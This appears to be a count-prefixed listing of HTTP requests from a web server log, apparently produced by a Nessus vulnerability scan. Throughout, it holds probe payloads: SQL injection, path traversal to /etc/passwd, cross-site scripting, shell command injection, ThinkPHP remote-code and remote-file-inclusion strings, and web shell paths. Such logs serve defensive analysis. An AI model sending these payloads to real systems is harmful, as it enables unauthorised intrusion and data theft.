1 GET /boastmachine/mail.php?id='/**/UNION/**/SELECT/**/1,2,1717627962,4--&blog=1 HTTP/1.1
1 GET /booking/help.php HTTP/1.1
1 GET /boonex/ HTTP/1.1
1 GET /boonex/plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /boonex/plugins/safehtml/safehtml.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
1 GET /boonex/ray/modules/global/inc/content.inc.php?sIncPath=/etc/passwd%00 HTTP/1.1
1 GET /boot/ HTTP/1.1
1 GET /breakcal/calendar.cgi HTTP/1.1
2 GET /brightmail/viewLogin.do HTTP/1.1
1 GET /broadWeb/bwRoot.asp HTTP/1.1
2 GET /browse.php HTTP/1.1
1 GET /browseDirectory.jsp?dir=/ HTTP/1.1
1 GET /browse_blogs.php HTTP/1.1
1 GET /bsml.pl?action=sm HTTP/1.1
1 GET /btauxdir/ HTTP/1.1
1 GET /btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /btmui/ HTTP/1.1
1 GET /buddy.php?action=<script>x</script> HTTP/1.1
1 GET /bug/ HTTP/1.1
7 GET /buglist.cgi HTTP/1.1
1 GET /bugport/php/index.php HTTP/1.1
1 GET /bugs/ HTTP/1.1
1 GET /bugs/modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /bugs/query.cgi HTTP/1.1
1 GET /bugs/sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /bugzilla/ HTTP/1.1
1 GET /bugzilla/query.cgi HTTP/1.1
1 GET /bugzilla3/ HTTP/1.1
1 GET /build/start.action HTTP/1.1
1 GET /builtin/index.html HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /business/ HTTP/1.1
1 GET /buy/ HTTP/1.1
1 GET /buynow/ HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /c100.php HTTP/1.1
1 GET /c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
1 GET /c99.php HTTP/1.1
1 GET /c99shell.php HTTP/1.1
1 GET /cache-stats/ HTTP/1.1
1 GET /cacti/ HTTP/1.1
1 GET /cacti/index.php HTTP/1.1
1 GET /cacti HTTP/1.1
1 GET /caja/ HTTP/1.1
1 GET /cal/ HTTP/1.1
2 GET /cal/day.php HTTP/1.1
1 GET /cal/preferences.php?action=setcookie HTTP/1.1
1 GET /cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1717627962 HTTP/1.1
1 GET /cal_event.php?id=1%27%20UNION%20SELECT%201%2c2%2c%27calendarix_id_sql_injection.nasl%27%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
1 GET /cal_make.pl?p0=../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cal_week.php?op=week&catview=999' HTTP/1.1
1 GET /calendar.php?month=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /calendar.php?month=&year=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /calendar.php?serverPath=/etc/passwd%00 HTTP/1.1
1 GET /calendar/ HTTP/1.1
1 GET /calendar/admin/cal_login.php HTTP/1.1
1 GET /calendar/cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1717627962 HTTP/1.1
1 GET /calendar/cal_event.php?id=1%27%20UNION%20SELECT%201%2c2%2c%27calendarix_id_sql_injection.nasl%27%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
1 GET /calendar/calendar.php?month=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /calendar/calendar.php?month=&year=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
2 GET /calendar/day.php HTTP/1.1
1 GET /calendar/embed/day.php?path=/etc/passwd%00 HTTP/1.1
1 GET /calendar/login.php HTTP/1.1
1 GET /calendar/preferences.php?action=setcookie HTTP/1.1
1 GET /calendar/protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
1 GET /calendar_admin.pl?config=|cat%20/etc/passwd| HTTP/1.1
1 GET /calendarexpress/ HTTP/1.1
1 GET /calendarexpress/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
1 GET /calendarix/ HTTP/1.1
1 GET /calendarix/cal_cat.php?op=cats&year=2008&catview=1+UNION+SELECT+1,1717627962 HTTP/1.1
1 GET /calendarix/cal_event.php?id=1%27%20UNION%20SELECT%201%2c2%2c%27calendarix_id_sql_injection.nasl%27%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13-- HTTP/1.1
1 GET /calendarix/calendar.php?month=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /calendarix/calendar.php?month=&year=%27%20UNION%20SELECT%201%2c1%2c%271717627962%27%2c%27calendarix_month_sql_injection.nasl%27%2c1%20%23 HTTP/1.1
1 GET /callboth.php?SEQ=654321&OUT=123456&IN=1717627965%40nessus%0d%0aasteridex_in_code_injection.nasl HTTP/1.1
1 GET /campsite/admin/login.php HTTP/1.1
1 GET /candypress/ HTTP/1.1
1 GET /captcha.html HTTP/1.1
1 GET /carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog HTTP/1.1
1 GET /card/ HTTP/1.1
1 GET /cards/ HTTP/1.1
1 GET /cards/admin/define.inc.php?match=http[:]//example[.]com/ HTTP/1.1
2 GET /cart/ HTTP/1.1
1 GET /cart/admin/index.php?cmd=login HTTP/1.1
1 GET /cart/viart_shop.xml HTTP/1.1
1 GET /cart32.exe HTTP/1.1
2 GET /cas/login HTTP/1.1
1 GET /cash/ HTTP/1.1
1 GET /caspsamp/ HTTP/1.1
1 GET /catalog.php?action=category_show&id=' HTTP/1.1
2 GET /catalog/ HTTP/1.1
1 GET /catalog/control/checkLogin HTTP/1.1
1 GET /caucho-status HTTP/1.1
1 GET /cbi-bin/ HTTP/1.1
1 GET /cc_guestbook.pl HTTP/1.1
1 GET /ccard/ HTTP/1.1
1 GET /ccards/ HTTP/1.1
1 GET /cd-cgi/ HTTP/1.1
1 GET /cd/ HTTP/1.1
13 GET /cdn-cgi/trace HTTP/1.1
1 GET /cdrom/ HTTP/1.1
1 GET /ce_html/ HTTP/1.1
1 GET /centreon/ HTTP/1.1
1 GET /centreon/index.php HTTP/1.1
1 GET /cerb/index.php/login HTTP/1.1
1 GET /cerb6/index.php/login HTTP/1.1
1 GET /cerberus-gui/ HTTP/1.1
1 GET /cerberus-gui/login.php HTTP/1.1
1 GET /cerberus-gui/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
1 GET /cerberus/ HTTP/1.1
1 GET /cerberus/index.php/login HTTP/1.1
1 GET /cerberus/login.php HTTP/1.1
1 GET /cerberus/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
1 GET /cert/ HTTP/1.1
1 GET /certificado/ HTTP/1.1
1 GET /certificate/ HTTP/1.1
1 GET /certsrv/ HTTP/1.1
1 GET /cfanywhere/index.html HTTP/1.1
1 GET /cfappman/ HTTP/1.1
1 GET /cfdocs/ HTTP/1.1
1 GET /cfg/shortcuts HTTP/1.1
1 GET /cfide/ HTTP/1.1
2 GET /cfooter.php3 HTTP/1.1
1 GET /cgi-auth/ HTTP/1.1
1 GET /cgi-bim/ HTTP/1.1
7 GET /cgi-bin-sdb/printenv HTTP/1.1
1 GET /cgi-bin/!pwds.txt HTTP/1.1
1 GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
1 GET /cgi-bin/%2f/admin.html HTTP/1.1
1 GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
1 GET /cgi-bin/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./windows/win.ini HTTP/1.1
1 GET /cgi-bin/.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./winnt/win.ini HTTP/1.1
1 GET /cgi-bin/.bash_history HTTP/1.1
1 GET /cgi-bin/.git/HEAD HTTP/1.1
1 GET /cgi-bin/.git/info/refs?service=git-upload-pack HTTP/1.1
1 GET /cgi-bin/.svn/entries HTTP/1.1
1 GET /cgi-bin//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin//home[.]html?0 HTTP/1.1
1 GET /cgi-bin//plugins/db/mysql/mysql.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/authorize_aim/authorize_aim.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/beanstream/beanstream.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/cdg/cdg.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/compuworld/compuworld.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/directone/directone.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/echo/config.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/efsnet/efsnet.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/eway/eway.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/linkpoint/linkpoint.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/logiccommerce/logiccommerce.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/netbilling/netbilling.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/payflow_pro/payflow_pro.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/paymentsgateway/paymentsgateway.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/payos/payos.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/payready/payready.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/plugnplay/plugnplay.inc.php HTTP/1.1
1 GET /cgi-bin//plugins/payment/theinternetcommerce/theinternetcommerce.inc.php HTTP/1.1
1 GET /cgi-bin/1717627705-ror_session_fixation.nasl HTTP/1.1
2 GET /cgi-bin/500page.jsp HTTP/1.1
1 GET /cgi-bin/5n3yrimx.asp?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.asp?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.aspx?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.aspx?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.cfc?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.cfc?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.cfm?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.cfm?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.cgi?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.cgi?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.dll?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.dll?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.do?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.do?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.exe?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.exe?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.fts?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.fts?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.htm?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.htm?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.html?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.html?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.idc?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.idc?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.jsp?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.jsp?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.jspa?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.jspa?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.kspx?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.kspx?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.mscgi?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.mscgi?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.nsf?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.nsf?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.php3?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.php3?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.php?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.php?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.pl?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.pl?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.x?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/5n3yrimx.x?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /cgi-bin/83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /cgi-bin/83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /cgi-bin/8nWK_13r.htm HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.asp HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.aspx HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cfc HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cfm HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.cgi HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.dll HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.do HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.exe HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.fts HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.htm HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.html HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.idc HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.jsp HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.jspa HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.kspx HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.mscgi HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.nsf HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.php3 HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.php HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.pl HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\">.x HTTP/1.1
1 GET /cgi-bin/<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.asp HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.aspx HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.cfc HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.cfm HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.cgi HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.dll HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.do HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.exe HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.fts HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.htm HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.html HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.idc HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.jsp HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.jspa HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.kspx HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.mscgi HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.nsf HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.php3 HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.php HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.pl HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script>.x HTTP/1.1
1 GET /cgi-bin/<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/?<IMG%20SRC=\"javascript:alert(cross_site_scripting.nasl);\"> HTTP/1.1
1 GET /cgi-bin/?<meta%20http-equiv=Set-Cookie%20content=%22testdvyn=7904%22> HTTP/1.1
1 GET /cgi-bin/?<script>cross_site_scripting.nasl</script> HTTP/1.1
1 GET /cgi-bin/?<script>document.cookie=%22testdvyn=7904;%22</script> HTTP/1.1
1 GET /cgi-bin/?Mode=debug HTTP/1.1
1 GET /cgi-bin/?cmd=Config HTTP/1.1
1 GET /cgi-bin/?mod=read&id=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/?p=subscribe HTTP/1.1
1 GET /cgi-bin/?s=admin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpadmin/%5cthink%5capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /cgi-bin/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.phpindex/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=index.php HTTP/1.1
1 GET /cgi-bin/?s=index/%5cthink%5cRequest/input&filter=file_get_contents&data=index.phpindex/%5cthink%5cRequest/input&filter=file_get_contents&data=index.php HTTP/1.1
1 GET /cgi-bin/?showimage=%27%29%20UNION%20SELECT%20%27pixelpost_15rc1.nasl-1717627936.jpg%27%20as%20id%2c%202049111472%20as%20headline%2c%201649358810%20as%20datetime%2c%20792128808%20as%20body%2c%20209316603%20as%20category%2c%20372359099%20as%20image-- HTTP/1.1
1 GET /cgi-bin/?title=Special:Recentchanges&feed=atom HTTP/1.1
1 GET /cgi-bin/?user=jffnms_user_sql_injection.nasl%27%20UNION%20SELECT%202%2c%27admin%27%2c%27%241%24RxS1ROtX%24IzA1S3fcCfyVfA9rwKBMi.%27%2c%27Administrator%27--&file=index&pass= HTTP/1.1
1 GET /cgi-bin/About/frmAbout.aspx HTTP/1.1
1 GET /cgi-bin/Admin.php HTTP/1.1
1 GET /cgi-bin/BrowserWeb/portal/portalbanner.htm HTTP/1.1
1 GET /cgi-bin/CFIDE/probe.cfm HTTP/1.1
1 GET /cgi-bin/CHANGELOG.md HTTP/1.1
1 GET /cgi-bin/CVS/Entries HTTP/1.1
1 GET /cgi-bin/CategoryView.aspx?category=nessus HTTP/1.1
1 GET /cgi-bin/ChangeLog HTTP/1.1
1 GET /cgi-bin/Config/diff.php?file=%26id&new=1&old=2 HTTP/1.1
1 GET /cgi-bin/Count.cgi?align=topcenter HTTP/1.1
7 GET /cgi-bin/Count.cgi HTTP/1.1
1 GET /cgi-bin/Edit.jsp?Page=Main HTTP/1.1
1 GET /cgi-bin/Edit.jsp?page=User&editor=../../../Install HTTP/1.1
7 GET /cgi-bin/FormHandler.cgi HTTP/1.1
7 GET /cgi-bin/FormMail.cgi HTTP/1.1
1 GET /cgi-bin/GTcatalog/index.php?function=custom&custom=http[:]//example[.]com/1 HTTP/1.1
1 GET /cgi-bin/GTcatalog/password.inc HTTP/1.1
1 GET /cgi-bin/HEAD HTTP/1.1
1 GET /cgi-bin/Nessus404/index.php HTTP/1.1
1 GET /cgi-bin/NonExistent.html HTTP/1.1
1 GET /cgi-bin/PJreview_Neo.cgi?p=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/README.TXT HTTP/1.1
1 GET /cgi-bin/RELEASE-NOTES HTTP/1.1
1 GET /cgi-bin/SLwebmail/ShowLogin.dll?Language=fr HTTP/1.1
1 GET /cgi-bin/SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1717627929%2c4%2c5 HTTP/1.1
1 GET /cgi-bin/Security/login HTTP/1.1
1 GET /cgi-bin/ServerView/SnmpView/SnmpListMibValues?SSL=&Server=34.68.118.83&ThisApplication=TestConnectivityFirst&ServerName=bcmes&Servername=127.0.0.1;id;,SType--Server&ParameterList=What--primary,,OtherCommunity--{{OtherCommunity}},,SecondIP--,,Timeout--5,,Community--public,,SType--,,ASPresent--1 HTTP/1.1
1 GET /cgi-bin/SnoopServlet/ HTTP/1.1
1 GET /cgi-bin/SystemInfo HTTP/1.1
1 GET /cgi-bin/UI/Login?user=nessus-1717627781 HTTP/1.1
1 GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1
1 GET /cgi-bin/WihPhoto/start.php HTTP/1.1
1 GET /cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/YaBB.pl HTTP/1.1
1 GET /cgi-bin/_admin/ HTTP/1.1
1 GET /cgi-bin/_head.php?_zb_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/_notes/dwsync.xml HTTP/1.1
1 GET /cgi-bin/_vti_inf.html HTTP/1.1
39 GET /cgi-bin/ HTTP/1.1
1 GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1
1 GET /cgi-bin/about.php HTTP/1.1
1 GET /cgi-bin/about/default_content.asp HTTP/1.1
1 GET /cgi-bin/about HTTP/1.1
1 GET /cgi-bin/account/?action=Login HTTP/1.1
1 GET /cgi-bin/account/login.php HTTP/1.1
1 GET /cgi-bin/acegilogin.jsp HTTP/1.1
1 GET /cgi-bin/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http[:]//example[.]com/ HTTP/1.1
1 GET /cgi-bin/acp/index.php HTTP/1.1
1 GET /cgi-bin/acp/lib/inserts.sql HTTP/1.1
1 GET /cgi-bin/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /cgi-bin/add.cgi HTTP/1.1
1 GET /cgi-bin/add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
1 GET /cgi-bin/add_user.php HTTP/1.1
1 GET /cgi-bin/addentry.php HTTP/1.1
1 GET /cgi-bin/addschup HTTP/1.1
1 GET /cgi-bin/adlayer.php?layerstyle=../../../../../../../etc/passwd%00 HTTP/1.1
7 GET /cgi-bin/admin.cgi HTTP/1.1
1 GET /cgi-bin/admin.php?action=viewpro&member=admin<script>x</script> HTTP/1.1
1 GET /cgi-bin/admin.php?dpt=conf&sub=general HTTP/1.1
1 GET /cgi-bin/admin.php?loggedin=1 HTTP/1.1
1 GET /cgi-bin/admin.php?style=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /cgi-bin/admin.php?zfaction=config HTTP/1.1
5 GET /cgi-bin/admin.php HTTP/1.1
1 GET /cgi-bin/admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
7 GET /cgi-bin/admin.pl HTTP/1.1
1 GET /cgi-bin/admin/ HTTP/1.1
1 GET /cgi-bin/admin/addentry.php?phpbb_root_path=/etc/passwd%00 HTTP/1.1
